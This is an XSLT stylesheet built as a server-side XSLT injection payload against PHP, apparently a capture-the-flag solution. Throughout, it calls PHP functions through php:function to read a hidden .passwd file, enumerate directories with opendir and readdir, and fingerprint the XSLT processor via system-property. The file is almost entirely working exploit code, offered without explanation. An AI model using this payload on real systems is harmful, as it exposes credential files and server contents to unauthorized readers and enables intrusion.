<?xml version="1.0" encoding="UTF-8"?>
  <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<xsl:template match="/">
<!-- <xsl:value-of select="php:function('file_get_contents','index.php')"/> -->

<xsl:value-of select="php:function('file_get_contents','./.6ff3200bee785801f420fba826ffcdee/.passwd')"/>

<!-- <xsl:value-of select="php:function('scandir','./')"/> -->
<xsl:value-of select="php:function('opendir','./')"/> <br />
<xsl:value-of select="php:function('readdir')"/> <br />
<xsl:value-of select="php:function('readdir')"/> <br />
<xsl:value-of select="php:function('readdir')"/> <br />
<xsl:value-of select="php:function('readdir')"/> <br />
<xsl:value-of select="php:function('readdir')"/> <br />
<xsl:value-of select="php:function('readdir')"/> <br />
<xsl:value-of select="php:function('readdir')"/> <br />
<xsl:value-of select="php:function('readdir')"/> <br />
<xsl:value-of select="php:function('readdir')"/> <br />
<xsl:value-of select="php:function('readdir')"/> <br />
<xsl:value-of select="php:function('readdir')"/> <br />
<xsl:value-of select="php:function('readdir')"/> <br />
<xsl:value-of select="php:function('readdir')"/> <br />
<xsl:value-of select="php:function('readdir')"/> <br />

.6ff3200bee785801f420fba826ffcdee
<xsl:value-of select="php:function('opendir','./.6ff3200bee785801f420fba826ffcdee')"/> <br />
<xsl:value-of select="php:function('readdir')"/> <br />
<xsl:value-of select="php:function('readdir')"/> <br />
<xsl:value-of select="php:function('readdir')"/> <br />
<xsl:value-of select="php:function('readdir')"/> <br />

._nginx.server-level.inc
<xsl:value-of select="php:function('opendir','./._nginx.server-level.inc')"/> <br />
<xsl:value-of select="php:function('readdir')"/> <br />
<xsl:value-of select="php:function('readdir')"/> <br />
<xsl:value-of select="php:function('readdir')"/> <br />
<xsl:value-of select="php:function('readdir')"/> <br />


<!-- <xsl:value-of select="php:function('opendir','./')"/> <br /> -->
<!-- <xsl:value-of select="php:function('readdir')"/> <br /> -->
<!-- <xsl:value-of select="php:function('readdir')"/> <br /> -->
<!-- <xsl:value-of select="php:function('readdir')"/> <br /> -->
<!-- <xsl:value-of select="php:function('readdir')"/> <br /> -->


Version: <xsl:value-of select="system-property('xsl:version')" /><br />
  Vendor: <xsl:value-of select="system-property('xsl:vendor')" /><br />
  Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" /><br />
</xsl:template>
</xsl:stylesheet>
  
